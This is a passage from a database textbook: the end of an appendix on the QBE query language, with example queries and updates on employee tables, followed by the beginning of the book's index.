tuple or tuples to be updated in the usual way. Figure 8(c) shows an update request

EMPLOYEE(a)

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

P.CNT.

EMPLOYEE(b)

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

P.CNT.ALL

EMPLOYEE(c)

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

P.AVG.ALL P.G.P.CNT.ALL

PROJECT(d)

Pname Pnumber Plocation

_PXP.

Dnum

WORKS_ON

Essn Pno Hours

P.CNT.EX G._PX

CNT._EX > 2

CONDITIONS

Figure 6
Functions and grouping in QBE. (a)
The query Q23. (b) The query Q23A.
(c) The query Q24. (d) The query Q26.

EMPLOYEE

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

P. P. _SX

DEPENDENT

Essn Dependent_name Sex Bdate Relationship
_SX

Figure 7
Illustrating negation by the query Q6.

1064

Appendix: Overview of the QBE Language

to increase the salary of ‘John Smith’ by 10 percent and also to reassign him to
department number 4.

QBE also has data definition capabilities. The tables of a database can be specified
interactively, and a table definition can also be updated by adding, renaming, or
removing a column. We can also specify various characteristics for each column,
such as whether it is a key of the relation, what its data type is, and whether an index
should be created on that field. QBE also has facilities for view definition, authoriza-
tion, storing query definitions for later use, and so on.

QBE does not use the linear style of SQL; rather, it is a two-dimensional language
because users specify a query moving around the full area of the screen. Tests on
users have shown that QBE is easier to learn than SQL, especially for nonspecialists.
In this sense, QBE was the first user-friendly visual relational database language.

More recently, numerous other user-friendly interfaces have been developed for
commercial database systems. The use of menus, graphics, and forms is now
becoming quite common. Filling forms partially to issue a search request is akin to
using QBE. Visual query languages, which are still not so common, are likely to be
offered with commercial relational databases in the future.

EMPLOYEE(a)

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

RichardI. MariniK M 37000 987654321 4653298653 30-Dec-52 98 Oak Forest, Katy, TX

EMPLOYEE(b)

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

D. 653298653

EMPLOYEE(c)

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

John Smith U._S*1.1 U.4

Figure 8
Modifying the database in QBE. (a) Insertion. (b) Deletion. (c) Update in QBE.

1065

This page intentionally left blank

Index

Index
Page references followed by “f” indicate illustrated
figures or photographs; followed by “t” indicates a
table.

/, 53, 56, 101, 280, 375-376, 423, 425, 431-434,
437-438, 440, 443-445, 462-463, 465,
468-470, 472, 475-478, 483, 491-493,
501-502, 504, 635, 693, 720, 858, 863,
914-915, 970-971, 1015, 1020, 1054-1055

//, 437-438, 492, 501-502

}, 5, 140, 151, 161, 164, 178-179, 181-188, 209,
238-239, 265, 296, 383-385, 391, 393,
396-398, 462-463, 467-470, 472, 475,
477-478, 482, 492-493, 496, 501, 504,
528-529, 545, 547-548, 552, 557-558,
561-563, 565-569, 577, 585, 600, 689,
696-697, 767, 952, 1059

<>, 93, 117-118

!=, 93, 495

<=, 92-93, 101, 118, 495, 691, 718-719, 960, 970-971 !, 93, 495 &, 342, 425 <, 61, 63, 72-73, 77, 88-90, 92-93, 101, 109, 117-118, 140, 151, 153, 161, 179, 186, 270, 296-297, 337-338, 341, 346, 423-426, 429-433, 439-440, 444-445, 461, 491-496, 578-580, 608-609, 620-621, 640, 651, 653-655, 657-658, 660-662, 666-668, 696-697, 701, 718-719, 744, 826, 905, 923, 970-971, 978, 985 ||, 87, 101, 858, 1002 ==, 462-463, 495 >, 52, 61, 63, 77, 89-90, 93, 101, 109, 117-118,
128-129, 133, 151, 161, 179, 186, 227, 234,
266, 270, 275, 296, 337-338, 346, 378, 380,
400-402, 408, 410-411, 425-426, 429-434,
443-445, 491-492, 494-496, 602, 604,
642-646, 660-662, 667-668, 672, 690-691,
696-697, 700-701, 718-720, 727, 730, 777,
793-795, 812, 848, 933, 970-971, 977, 985

::, 140, 935

+, 8, 17, 36, 40, 83, 88, 93, 101, 158, 352, 358-359,
365, 371, 381-382, 394, 402, 411-416, 435,
454, 457, 459, 468-471, 477-478, 567, 608,
640, 659, 661-662, 672, 689-690, 696-702,
718-723, 773, 777, 786-787, 953, 970, 989,
1005-1006, 1020

/=, 971

>=, 93, 101, 118, 495, 691, 718-719, 970-971, 977

1
1984, 143, 355, 623, 668, 679, 746, 875, 924-926,

988-989

3
3D objects, 25, 988
3NF, 350, 524-526, 530-537, 541, 543-549, 551-552,

559-560, 565-569, 573-574, 582, 584-586,
738, 741, 746

4
4NF, 524-525, 530, 539-541, 574-577, 582, 737

A
Abort, 755-757, 760-762, 765, 776, 789-791, 822, 825,

834, 907-909
abstract, 11, 22, 60-61, 106, 244, 266, 269-271, 274,

277, 365, 374, 411, 414, 929, 958
BASIC, 61, 106, 266, 269, 400, 411, 414, 929
exception, 269
float, 411
generalization, 266, 269-270, 274
generic, 365
inheritance, 22, 266, 274, 374, 400, 414
instance, 269, 271, 365
long, 60, 411
members, 266, 277
name, 11, 60-61, 244, 270-271, 365, 374
pointers, 22
primitive, 271
short, 411
specialization, 266, 269-270, 274
subclass, 266, 269-270, 274
superclass, 266, 269-270, 274

abstract classes, 266
Abstraction, 8-11, 21, 28, 251, 268-271, 275
acceptability, 313, 331, 841-842
Access:, 862
access, 1-5, 8-11, 13-14, 16-17, 21-22, 25, 27, 29, 32,

34, 37-38, 40-42, 44-46, 48, 55-56, 105-106,
204, 229, 276, 311-312, 329-334, 348, 365,
367, 399, 410, 460, 471, 476-477, 493-494,
499-500, 502, 504, 589-590, 592, 597, 601,
603-608, 614, 616-617, 622-623, 625,
628-630, 633-634, 636-638, 640-641, 647,
649-650, 654-655, 657-658, 665-668,
673-676, 678-679, 682, 690-695, 706,
716-717, 719, 724-728, 733-736, 748-752,
766-767, 774, 781-783, 787-788, 796,
804-805, 828, 836-845, 851-860, 862-863,
868-873, 875-876, 882-884, 908-909, 911,
913-914, 918-919, 926, 930, 961, 997-998,
1017-1018, 1027-1028, 1044-1047

methods, 48, 329, 334, 348, 454, 476, 606, 673,
690-694, 714, 717, 719, 724, 758, 863,
872, 908, 911, 997, 1046

Access control, 836, 838, 840-843, 848, 851-856, 862,
868-873, 875-876

database, 836, 838, 840-843, 848, 851-856, 862,
868-873, 875-876

policies of, 841
Access time, 332, 610-611, 623, 629-630, 691, 1054
access times, 611, 623, 682
accessibility, 1037
accuracy, 235, 336
ACM, 26, 81, 285, 779, 891
Action, 76, 91, 105, 107, 132-133, 244, 291, 293,

338-340, 492-494, 498, 745, 757, 812,
825-826, 837, 854, 869, 875, 931-932,
934-940, 981

action attribute, 493
Active records, 634
Actors, 12, 25, 243-244, 336-337, 342
add method, 728

algorithm, 728
efficiency of, 728

adding, 15, 31, 33, 122, 137-139, 322, 324, 328,
366-368, 400, 403, 553, 627, 726, 773, 777,
844, 857, 882, 909, 939-940, 945, 951

security, 122, 844, 857, 951
Addition, 3, 14-16, 22-23, 25, 28, 38, 48, 52, 55, 69,

85, 88, 92, 101, 105-106, 152, 177, 180,
229, 269, 273-274, 277, 316-317, 365, 374,
387, 391, 399, 411, 413, 425, 447, 466,
483-484, 559, 627, 715-716, 721, 727, 762,
773, 828, 848-849, 869, 882-883, 936,

953-955, 1047
address, 2, 58-62, 67-68, 71, 80, 86, 93-97, 100, 108,

110-111, 123-124, 139, 143-145, 151, 154,
159, 167-168, 174-175, 179, 181-182,
187-188, 191-192, 199-200, 205-209,
212-213, 227-229, 236-237, 244, 253, 256,
260, 262-263, 267, 277-279, 282-283,
288-290, 305-306, 346, 349, 351, 354, 356,
361-362, 366, 369, 396, 418-419, 435,
449-453, 462, 467-468, 486, 489, 507,
511-513, 531, 552, 571-572, 595-597, 607,
611-617, 630-632, 666-668, 677, 706-707,
714-715, 718, 731-732, 812-813, 846-847,
865, 867-868, 877, 925, 927-928, 956,
993-994, 1022, 1025, 1054-1055, 1063-1065

Address space, 612-616
Addresses, 2-3, 12, 62, 191-192, 195, 277, 598, 603,

608, 611, 613-615, 617, 629, 637, 654,
666-667, 673, 816, 853, 911, 994, 1024,
1027

base, 1024
fields, 603, 608, 637
Internet, 853
introduction to, 2, 994, 1010, 1024, 1027
IP, 629, 1024
logical, 62, 613, 637, 673
main memory, 598, 603, 611
map, 667
memory, 598, 603, 611, 629, 635, 816
network, 598, 1010
number of, 191-192, 195, 208, 603, 608, 613-615,

617, 619, 654, 666-667
partitioning, 637
physical, 608, 637, 673
real, 2, 62
relative, 614-615
TCP, 629
virtual, 1024

Addressing, 613-614, 853
blocks, 614
level, 853
scope, 613

adjusting, 714
Administrator, 13, 84, 310, 839, 841-842, 853-854,

856, 870, 873, 919, 950, 1047
Administrators, 13, 311, 733-734, 839, 853, 870, 1048
Adobe, 892
Advanced Encryption Standard (AES), 864
Agent, 11, 852, 916, 1023, 1029, 1036
aggregation, 124, 189, 228-230, 269-272, 274-276,

285, 356, 520, 543, 955, 1037, 1042, 1062
dependency, 520, 543
Exception, 269
objects and, 270-271
String, 886
use of, 271, 356, 886, 1042

Algebra, 55, 71, 75, 81, 82-83, 92-93, 97, 99, 148-200,
245, 296, 301, 416, 686-687, 690, 704-708,
711, 713-714, 730, 895, 902-904, 907, 953,
978-979, 987, 989, 996

algebraic, 71, 686, 708, 713-714, 723-724, 728, 987
algorithm, 198, 287-288, 293, 296, 299, 301, 304, 372,

399, 415, 510, 538, 551, 555-558, 560-569,
573-574, 577, 582, 584, 586, 608, 610,
612-613, 621, 635, 648-649, 660, 662, 665,
674, 678-679, 688-690, 694-695, 698-702,
704-705, 713-715, 723, 728-730, 761-762,
790-794, 810, 814-815, 819-822, 826, 839,
864-866, 912, 989, 1003, 1005, 1019-1020,
1031-1033

merge, 610, 688-689, 694-695, 699, 702, 704,
729-730

representation of, 705
algorithms, 39, 56, 287, 301, 304, 350, 372, 436, 510,

521, 550-586, 613-614, 619, 633-635, 646,
654, 656, 659-660, 665, 668, 675, 679,
684-730, 732, 783, 807-808, 810-811, 821,

1067

831, 835, 864-865, 873, 901-902, 905,
924-926, 962, 988, 995-996, 1001, 1016,
1018-1020, 1027, 1031-1033

algorithms:, 613
analysis of, 635, 679, 926, 1018, 1029
Data Encryption Standard (DES), 864
decryption, 864-865
encryption, 839, 864-865, 873
graphs, 706, 708, 807
mathematical, 555, 864
properties of, 510, 551, 558, 568, 573, 582-583,

1016, 1019
queue, 783
recursive, 651, 665
set, 350, 510, 521, 550-562, 564-569, 573-575,

577-579, 582-586, 654, 660, 665, 668,
689, 692, 696-697, 701-705, 711-712,
719, 728-729, 794, 962, 996, 1001, 1023,
1031

statements, 39
aliases, 96-97, 119, 178, 941
Alice, 68, 111, 159, 199, 305, 732, 990
alignment, 1023
ALL, 1-4, 7-9, 11-13, 15-16, 19-20, 22, 24, 26, 27, 34,

36, 42-43, 46-47, 51-52, 57, 59, 63-67, 70,
73-77, 87, 90-93, 95, 97-105, 107-108,
117-126, 128-130, 132-133, 135, 137-139,
141, 151-152, 154-158, 160-161, 163-167,
169-176, 178-181, 183-187, 189-196, 204,
210-212, 219, 221-223, 228, 232, 234, 237,
239, 241, 246-247, 251-253, 255-262,
264-266, 274-279, 281, 283, 289-291,
294-295, 297-301, 313-314, 318-319, 321,
325, 328, 330-331, 339, 348, 354-355,
360-363, 365, 367-373, 379-383, 386-389,
391-392, 399-401, 403-408, 411-412,
420-422, 430, 434, 436-438, 446-447, 465,
483-484, 495-496, 503-504, 516-517,
521-524, 540-545, 555-563, 566-567, 572,
577-578, 584, 598-601, 604-608, 617,
620-622, 624-625, 634, 670-674, 677-678,
700-703, 711-713, 717-719, 726-727,
740-746, 749-752, 754-765, 770-772, 775,
787-790, 792-801, 803-804, 814-816,
840-846, 848-851, 858-859, 870-872,
874-875, 879-880, 895-898, 902-913,
916-917, 920, 922, 924, 940-941, 956-961,
966-968, 970-982, 987-988, 1020-1022,
1060-1064

Amazon, 3, 915
American National Standards Institute (ANSI), 53, 83
ampersand, 425
analog, 189

data, 189
Ancestor, 438, 986

complete, 986
descendant, 438
node, 438
parent, 438, 986
root, 438

Anchor text, 1019
AND, 1-26, 27-54, 55-81, 82-85, 87-93, 95-109, 112,

115-147, 148-200, 201-215, 217-224,
226-239, 241-245, 246-266, 268-285,
287-308, 309-356, 357-419, 420-428, 430,
433-442, 444-448, 454-487, 490-506,
508-549, 550-586, 636-638, 640-641,
645-649, 651-679, 684-730, 732, 733-746,
780-809, 836-876, 900-927, 934-989,
1034-1049, 1058-1065

AND function, 129, 406, 1008
AND operation, 14, 360, 406, 409
anonymous, 919
ANSI, 31, 33, 53, 83, 143, 355
ANY, 3, 7-9, 13, 16-17, 28, 30-31, 35, 38, 45-46,

48-49, 59-60, 62, 64-65, 69, 72, 75-76,
79-80, 85, 91, 95, 97, 99-100, 104, 125,
134-136, 138-139, 141, 152-157, 160-161,
164, 173, 177-178, 185, 188-189, 191, 193,
195-196, 198, 210-212, 220, 222, 231,
233-234, 236-237, 239, 241, 248-249,
253-254, 264-266, 278, 280-281, 292-294,
296-301, 314, 316-318, 320-322, 332,
336-337, 348, 350, 363, 377, 392, 399,
401-405, 408-409, 412, 434-435, 459-460,
464-466, 471-474, 476-477, 481, 501-502,
508, 524-526, 539-542, 545-546, 551-557,
559-562, 568, 578-579, 604-605, 627-628,
630-631, 636-637, 666-668, 672-673,

691-694, 708, 711-713, 720, 734-735,
756-763, 765-769, 772-773, 775, 782-784,
793-794, 796-801, 811-814, 818-821,
824-826, 829-833, 851-853, 861-864, 881,
911-913, 915-916, 962, 970-972, 977,
979-980

API, 45, 413, 428, 456, 471, 476, 870
apostrophe, 100, 425
application, 3-5, 7-11, 14, 18-25, 27-28, 31, 33-35,

38-46, 48, 52, 64, 70-71, 75, 78, 82, 84, 109,
201-205, 230, 232, 237, 239, 241, 247, 262,
264, 275-276, 278, 280, 285, 312-315,
317-321, 333-335, 339-342, 344, 351-353,
355, 363, 367, 370-371, 374, 389-390, 401,
413, 415, 428, 455-456, 461, 476-477,
480-481, 545-546, 561, 727, 851, 853-855,
864, 867-870, 877-879, 882, 885-886,
891-894, 907, 914-920, 924-925, 940-943,
951, 957-959, 962-963, 1016, 1018,
1022-1024, 1026-1027

application layer, 892-893
application log, 1027
application programming interface, 45, 428, 456, 471,

476
Application server, 40, 46, 480, 892-894, 920
application system, 314-315
Applications, 1-3, 8, 11, 14-15, 18-25, 30, 32, 42-43,

45-48, 51-52, 70, 75, 82-83, 124, 133, 149,
164-165, 173, 177, 201, 235, 237, 274, 285,
311-319, 321-322, 328, 330-332, 336,
341-342, 344, 351-353, 355-356, 365, 414,
416, 456-457, 590, 592, 600, 610, 621,
626-627, 679, 739, 744-745, 773-774, 779,
794, 852-854, 856-857, 866, 869-870, 890,
894, 918, 922, 924, 926, 929-989, 991,
1018, 1022-1024, 1026-1027, 1045

applications of, 1, 342, 679, 745, 930-931, 940,
962-963, 982-983, 988, 999, 1026, 1031

search trees, 679
architecture, 27-54, 317, 353, 394, 416, 458, 480, 491,

497-499, 505, 588, 635, 870-871, 886-893,
915-916, 919-921, 926, 1037, 1044-1045

client/server, 27-28, 42-46, 51-52, 458
file system, 47
IEEE, 416
middleware, 46, 48, 886
protocol, 499, 892, 916, 919, 921
three-tier client/server, 46, 52

Arguments, 10, 328, 338, 360, 365, 369, 379, 406,
497-499, 503, 542, 554, 798, 968-971,
973-974

array, 497-499, 503
example of, 542, 970
multiple, 338, 497, 798, 970
names, 10, 360, 379, 406, 503, 968-969, 971
of parameters, 379
passing, 360

Arithmetic, 62, 100-101, 134, 169, 438, 581, 583, 613,
742, 866, 970

expression, 438
operators, 100-101, 970

Arithmetic operations, 134, 169, 970
arithmetic operators, 100-101

list of, 101
Array, 310, 363, 373-375, 377, 385-386, 388-389, 393,

414, 479, 492-493, 495-501, 503-505, 591,
611-613, 617, 623-625, 667-669, 676, 960

accessing, 499-500, 505, 667, 676
elements of, 363, 388
of objects, 363, 386
ordered, 363, 388, 611, 668, 676
size, 310, 363, 385, 389, 393, 617, 960
size of, 310, 617
variable, 363, 479, 492-493, 496-497, 499-500,

503-504
array of, 310, 363, 591, 611-612, 617, 623-625, 669

code, 612, 623
Array variables:, 496
Arrays, 409, 459, 492-493, 495-497, 505, 588,

623-624, 630, 635, 965
element of, 409
elements, 409, 492, 495-497, 505, 965
higher dimensional, 496
parallel, 623
parameters, 492-493
string, 493, 495, 497, 505
variables, 459, 495-497, 505

arrays, and, 505
AS:, 58, 168, 538, 549, 585, 727, 849, 923, 931, 1020

ASCII, 612
aspects, 30, 40, 56, 81, 143, 268, 281, 309, 313, 334,

350, 355, 381, 416, 486, 523, 842, 853, 965,
998-999, 1032, 1043

Assertion, 62, 70, 83, 92, 115, 131-132, 139
Assertions, 70, 84, 105, 131, 141, 481, 582, 1006
assessment, 868-869, 875, 998, 1000, 1002
assets, 868
assignment, 11, 58, 494, 667, 738, 862, 940, 970

declaration, 940
local, 58
statement, 934, 940
this, 11, 58, 494, 667, 738, 862, 940, 970

Assignments, 178, 497-499, 984
Association, 29, 81, 214, 229-230, 269-271, 346, 385,

389, 867, 887, 944, 961-962, 983, 988, 1025
associative, 157, 389, 493, 496-497, 712, 723, 834

sequence, 496
Associative array, 493, 496-497, 499
Assurance, 841-842
asterisk (*), 97, 125, 229
Atom, 179-180, 186-187, 190, 362-363, 382, 390
AT&T, 25, 358, 417
Attacks, 851, 856-859, 868-869, 874-875, 1027

types of, 857, 874
attribute values, 72-73, 89-90, 92-93, 95, 97, 100,

103-104, 126, 146, 178-179, 185, 206, 208,
211, 221, 270, 361, 373, 390, 401, 457,
468-469, 510, 514, 693, 849-851, 963

Attributes, 29, 57-61, 63-67, 69-70, 72-76, 79-80, 85,
87, 89-91, 93, 95-97, 99, 101-103, 105-107,
109, 119-120, 122-126, 134-135, 137,
140-141, 150-156, 158, 160-163, 166-170,
172-176, 178-179, 181-182, 186-187,
189-190, 193, 196, 202, 205-214, 216,
220-224, 226, 229-230, 234-237, 241, 245,
249-251, 261-262, 264-266, 273-276,
278-280, 282, 284, 287, 289-300, 320-322,
333, 342, 350, 360-361, 364-369, 372-375,
378-380, 386, 390-392, 394-395, 398-402,
404, 406, 410-411, 413-415, 421-422,
427-430, 437-439, 441-442, 448, 459-460,
464-465, 471-472, 502, 508-511, 513-517,
519-526, 528, 537-540, 542-546, 551-553,
555-560, 565-570, 572-575, 581-582,
584-585, 592, 675-676, 692, 697-700, 727,
734-738, 741-742, 849, 886, 895-896, 898,
904-906, 945-946, 948, 1040, 1050-1051

of entities, 202, 205, 209-210, 214, 234, 261, 265,
274

Audio, 1, 591, 600, 623, 930, 963-964, 967, 982, 984,
988, 996, 998, 1017, 1029

compression, 964
audio files, 996
auditing, 757, 875, 919
Australia, 245
Authentication, 628, 842, 855-858, 865-867, 919

digital signatures, 866
intrusion detection, 842
means of, 842, 866
password-based, 919
summary, 919

authorization, 17, 38, 83-84, 106, 135, 416, 460, 838,
840, 843-846, 851-852, 854, 871-873, 875,
1065

Autocommit, 467
Autoindexing, 1032
Average, 3, 11, 125-126, 141-142, 169-171, 191, 193,

276, 284, 312, 333, 369, 406-407, 410, 485,
570, 595-596, 603, 607-608, 610-611, 629,
631-634, 645, 654, 659-660, 670, 675, 682,
717-722, 860-861, 955, 1005, 1029,
1054-1055, 1063

average access time, 610
average seek time, 631, 634, 1054

B
background, 863, 916, 966, 989

noise, 966
backgrounds, 961
Backing up, 592, 597-598, 830
Backup utility, 41
backups, 41, 628
Backward compatibility, 916
Bag, 92, 153, 363, 367-368, 373-374, 384-386,

388-389, 401, 403, 405, 407-408, 410-411,
414

Balanced tree, 657, 960
base, 33, 43, 56, 85, 105, 123, 133-139, 142, 232,

1068

266, 337, 361, 514-518, 520, 525, 549, 585,
650, 657, 723-724, 735, 737-738, 744,
846-847, 926, 936, 951, 958, 976, 979, 986,
1024

identifying, 232
Base class, 266
Basis, 48-49, 55, 148-149, 177, 189, 247, 249, 273,

333, 378, 706, 729, 966, 989, 1004, 1020
Batch processing, 328
Berg, 635
bgcolor attribute, 497
Binary operation, 706
Binary relationship, 216, 218, 223-224, 226, 229,

231-233, 236, 241, 364, 390, 399, 401-402,
412

Binary search, 608, 610-611, 629, 632-633, 637-638,
640, 642, 645, 648-649, 675, 679, 682, 691,
718

Binary search algorithm, 645
Binary search trees, 679
Binary trees, 654

full, 654
Bioinformatics, 962, 1022
Bit, 87, 121, 591, 593-594, 607, 617, 619, 623, 625,

666, 669-671, 813-814, 864-865, 1041-1042
Bit string, 87
Bitmap, 636-637, 668-671, 674-676, 1041-1042
Bitmap index, 668-671, 676, 1042
Bits, 87-88, 298, 593, 597, 617, 619, 624-625, 630,

635, 636, 667-671, 864, 964, 1042
BitTorrent, 996
BLOB, 88, 600
Block, 55, 92, 120, 336, 590, 594-599, 602-605,

607-611, 614-615, 617, 619, 623-626,
629-634, 638-649, 651-661, 668, 673-674,
676-678, 681, 686-692, 694-695, 716-719,
721-723, 725-726, 741, 749-750, 758,
798-799, 813-814, 823, 835, 843, 864, 866,
934-935, 1054-1056

Block transfer, 596, 599, 629, 631-632, 634,
1055-1056

Blocks, 117, 120, 332, 381, 588, 594-598, 600-611,
614-616, 621, 625, 629-633, 636-638,
640-641, 645-649, 651-652, 655-656, 658,
666, 674-675, 677-678, 681-682, 686-690,
694-695, 698-701, 716-719, 721-722, 729,
744-745, 750, 755, 758, 801, 814, 823, 864,
908, 1054-1055

record blocking, 602
blogs, 999
, 423-424

call, 482, 980
books, 3, 24, 79, 143, 191-193, 239, 267, 276-277,

319, 354-355, 416, 424, 427, 455, 480,
485-486, 505-506, 547, 586, 679, 746, 835,
923, 927, 963, 982, 997, 1032, 1049

Boolean, 87-88, 93, 116-117, 120, 150-152, 178-179,
211, 297-298, 366, 382-386, 408, 467, 574,
600, 604, 670, 713, 957, 999-1002,
1006-1007, 1014, 1029-1030

false, 88, 116-117, 120, 152, 178-179, 386, 408,
600, 1014

true, 88, 93, 116-117, 120, 151-152, 178-179, 386,
408, 600, 1007

Boolean condition, 93, 179, 408
Boolean values, 382
border, 423
Braces, 140, 209, 528
Brackets, 102, 129, 140, 182, 423, 425, 464, 708
Branches, 239-240, 286, 713
break, 154, 184, 446, 483, 713-714, 864, 894, 1012

do, 154, 184, 446, 483, 714, 894
if, 184, 446, 483, 713-714, 894, 1012
loops, 483

brightness, 965
Browser, 46, 441, 490-491, 493, 892, 926, 963
Browsers, 13, 331, 892

primary, 13
B-tree, 622, 652, 654-660, 665, 675-676, 678-679
Bubble sort, 688
Buckets, 614-621, 630-631, 633-635, 666-668, 673,

682-683, 695, 702, 959-960
Buffer, 38, 40, 595-596, 598, 604-605, 607-608, 611,

644, 679, 688-690, 698, 715, 723, 726, 729,
739-740, 750-751, 757-758, 805, 812-815,
819-820, 825-826, 830, 832-833, 957, 1054,
1056

Buffering, 14, 17-18, 45, 588, 598, 603, 610, 629-630,
632-633, 698, 812, 831

cache, 812
single, 598, 633, 698, 831

Bug, 857
Bugs, 754
Bus, 43, 590, 887
businesses, 628-629, 1018
button, 493
buttons, 14
byte, 10, 593, 600-601, 607, 625, 632, 677
bytes, 3, 10, 474, 593-594, 596-597, 599-602,

624-625, 631-632, 634, 640, 659, 670-671,
677, 708, 902-904, 1005, 1055-1056

C
C, 5-6, 8, 12, 16-17, 19, 36, 40, 54, 77, 80, 83, 93-95,

99-100, 107-109, 112, 116-117, 141-142,
147, 151-153, 179-180, 186, 190-191,
193-197, 231-233, 237, 239-240, 243, 245,
262, 265, 271-272, 280-283, 286, 290, 292,
296-298, 304, 324, 352, 354, 363, 365, 367,
375-376, 379-382, 394, 396, 407-408,
411-416, 446, 448, 454, 457-463, 465-466,
468, 471-475, 484-485, 487, 490-493,
522-523, 527-529, 534-537, 542, 545-549,
562-563, 569-573, 585, 598-602, 612,
631-632, 634, 677-679, 707, 709-714,
720-721, 725, 735, 752-753, 760-761,
767-771, 778, 809, 816-818, 826-828,
848-851, 884-885, 898, 923-924, 978,
985-987, 1020-1021, 1059-1061, 1063-1065

C++, 8, 17, 36, 40, 83, 93, 265, 352, 358-359, 363,
365, 367, 381-382, 394, 402, 411-416, 454,
457, 459, 471, 892

C#, 262, 454, 892
C programming language, 359, 380, 468, 484, 491,

495, 600
Cables, 627, 879
Cache memory, 590
Calendars, 943, 1043
Call statement, 482
callbacks, 428
Canada, 245
Cancel, 341, 771, 840
Candidate keys, 65-66, 76-77, 524, 526, 532-533,

535, 543, 548, 552, 558, 573
Canonicalization, 855
Cards, 548, 590, 1043
Cartesian product, 59, 124, 149, 158-161, 163-164,

167, 189, 212, 214, 702, 708-709, 711,
713-714, 720, 724, 728-729

cartridges, 598
cascade, 73, 90-91, 107, 109, 138-139, 146, 152, 293,

713
case, 4, 9, 18, 33, 35-36, 41-42, 51, 62, 65, 67, 69,

73-74, 87, 91, 95-96, 109, 128, 130, 134,
136-137, 153-154, 180, 182, 187, 221, 226,
229, 232-234, 252-254, 258-259, 270-271,
276, 284, 287, 291, 330, 332-333, 335-338,
349, 351-352, 404, 446, 461-462, 465,
526-528, 537-538, 562-564, 577-578, 590,
596-598, 601-604, 610-611, 614-615, 624,
634, 637, 640-641, 665, 671-672, 679,
699-701, 703-704, 717-723, 726, 749-750,
761-763, 767-768, 819-820, 833, 896-898,
910-911, 977, 979

error, 319, 461, 624, 626, 628, 774
Case sensitive, 87, 494
case statement, 672
Case study, 276
CASE tools, 41, 319, 351, 1050
Catalog, 1, 3, 8-11, 14, 19, 25, 31, 34-35, 38-41,

84-85, 138, 196, 237, 276-277, 340-343,
622, 685, 693, 703, 713, 716-717, 883,
889-890, 905, 919, 921-922, 997, 1017

Cell, 80, 590, 667, 963-964, 1010, 1038
Cell phone, 80
Cells, 667, 963-964, 966
central processing unit, 589, 716
central processing unit (CPU), 589

networks, 589
programs, 748
software, 589
speed, 589

Certificate, 866-867, 874, 919
certification, 772, 780, 797, 805-806, 867
Certification Authority (CA), 867
Chaining, 612-614, 616, 618, 630-631, 633-634, 968
change, 3-4, 7, 10, 19-20, 24, 30-31, 33-34, 58, 72-74,

80, 82, 89, 109, 137, 139, 141, 194,

223-224, 243, 267, 313, 318-320, 339-340,
344, 347, 349, 356, 372, 391-392, 396, 418,
425, 430, 516, 562, 604, 606, 633, 655, 673,
714, 717, 752-753, 760-761, 824-826,
856-857, 950-951, 958-959, 977, 985, 991,
1036, 1044-1045

Channels, 628, 836, 839, 861-863, 873-874, 965
synchronization, 862

chapters, 19, 319, 329, 355-356, 987, 1050, 1052
Character data, 429, 956
character strings, 57, 88, 151, 382, 612, 666, 969, 999

data and, 88
Characters, 3, 5, 9-10, 19, 64, 87, 151, 211, 382, 461,

493-495, 600-603, 612, 630, 634, 858-859,
1007

formatting, 425, 601
order of, 603, 999
special, 64, 382, 461, 494, 601-602
storing, 3, 593, 600

Charts, 318-319, 995
Check, 13, 70, 74-75, 77, 89-90, 92, 117, 120,

131-132, 276-277, 402, 420, 465, 480-481,
484, 524, 558, 560-561, 567, 573, 581, 673,
702, 719, 755-756, 772, 787, 793, 797-798,
800, 807, 934-935, 958, 962, 977, 984, 1043

Checkpoint, 815-816, 819-822, 825-827, 830, 832
Child, 166, 221, 345, 437-438, 442, 444, 651-652,

723, 802-803, 960
child class, 345
China, 245, 998
Choice, 18, 52, 58, 66, 109, 221, 224, 229, 261, 264,

282, 301-302, 315-317, 331-332, 338, 350,
353-354, 401, 592, 626, 740, 989, 997,
1000, 1036, 1044

ciphertext, 863-865
circles, 182, 250, 370, 398, 594, 708
circular, 85, 91, 593
class, 4-10, 17, 19, 29-30, 37, 47-48, 54, 57, 70, 77,

108-109, 112-113, 147, 196, 202, 210, 226,
228-230, 235-236, 242, 246-248, 251,
255-259, 262-263, 265-267, 269-271, 275,
280, 285, 299, 320, 328, 342-343, 345-349,
356, 358-360, 365-371, 386-387, 389-392,
394-406, 408, 411-415, 418, 442-445,
476-478, 484, 545, 578, 632, 849, 856,
861-862, 929, 952, 964, 967, 991,
1050-1051

block, 336, 632
child, 345, 442, 444
derived, 19, 230, 235-236, 255, 320, 400, 412
hierarchy, 255-259, 269-270, 275, 368, 370, 389,

414, 442, 444, 1010
class diagrams, 202, 210, 226, 228-230, 235, 266,

269, 275, 320, 335-336, 342, 345, 347-348
class hierarchies, 259, 359-360
classes, 48, 77, 228-229, 243, 257-261, 266-267,

269-271, 274, 281-282, 299-300, 336, 342,
346, 349, 360, 365, 370, 372, 386-387,
389-390, 392, 394-395, 401, 411, 413, 415,
422, 476-477, 484, 848, 861-862, 872, 1050

arguments, 360, 365
client, 48, 1025
diagram, 228, 243, 259, 266-267, 274, 281-282,

342, 346, 349, 389, 401
instance variables, 360, 365
instances of, 243
interactive, 1032
language, 48, 360, 365, 389-390, 394, 411, 413,

422, 466, 476, 484, 1032
naming, 392
nested, 422
outer, 965
packages, 336
pair, 360, 389-390
separate, 48, 229, 349, 411, 466
top level, 401

classes and, 269-270, 336, 394, 411, 415, 484, 862,
872

ClassNotFoundException, 477-478
cleaning, 1024, 1043-1044, 1047
Cleartext, 864
CLI, 105, 455, 471-475, 484-485, 500, 892-893
click, 350, 465, 1018, 1058
Client, 27-28, 40, 42-48, 51-52, 312, 323, 329, 420,

458, 480-481, 491, 499-500, 505, 628, 887,
892-893, 915-917, 919-922, 926-927, 1025

Client computer, 40, 491, 505
Client program, 40, 45, 458
clients, 22, 36, 43, 45-47, 628, 863, 884, 920

1069

Client-server architecture, 48, 480, 877, 892, 916,
920-921, 1037

Client/server interaction, 45
Client-side, 45
Clock, 312, 792, 944
cloud computing, 878, 914-915, 921-922, 927
Cluster, 85, 140, 596, 614, 622, 641, 643, 645, 655,

678, 718-719, 736-737, 961-962, 1046
Clusters, 603, 962
COBOL, 8, 49, 83, 454
CODASYL, 49, 53
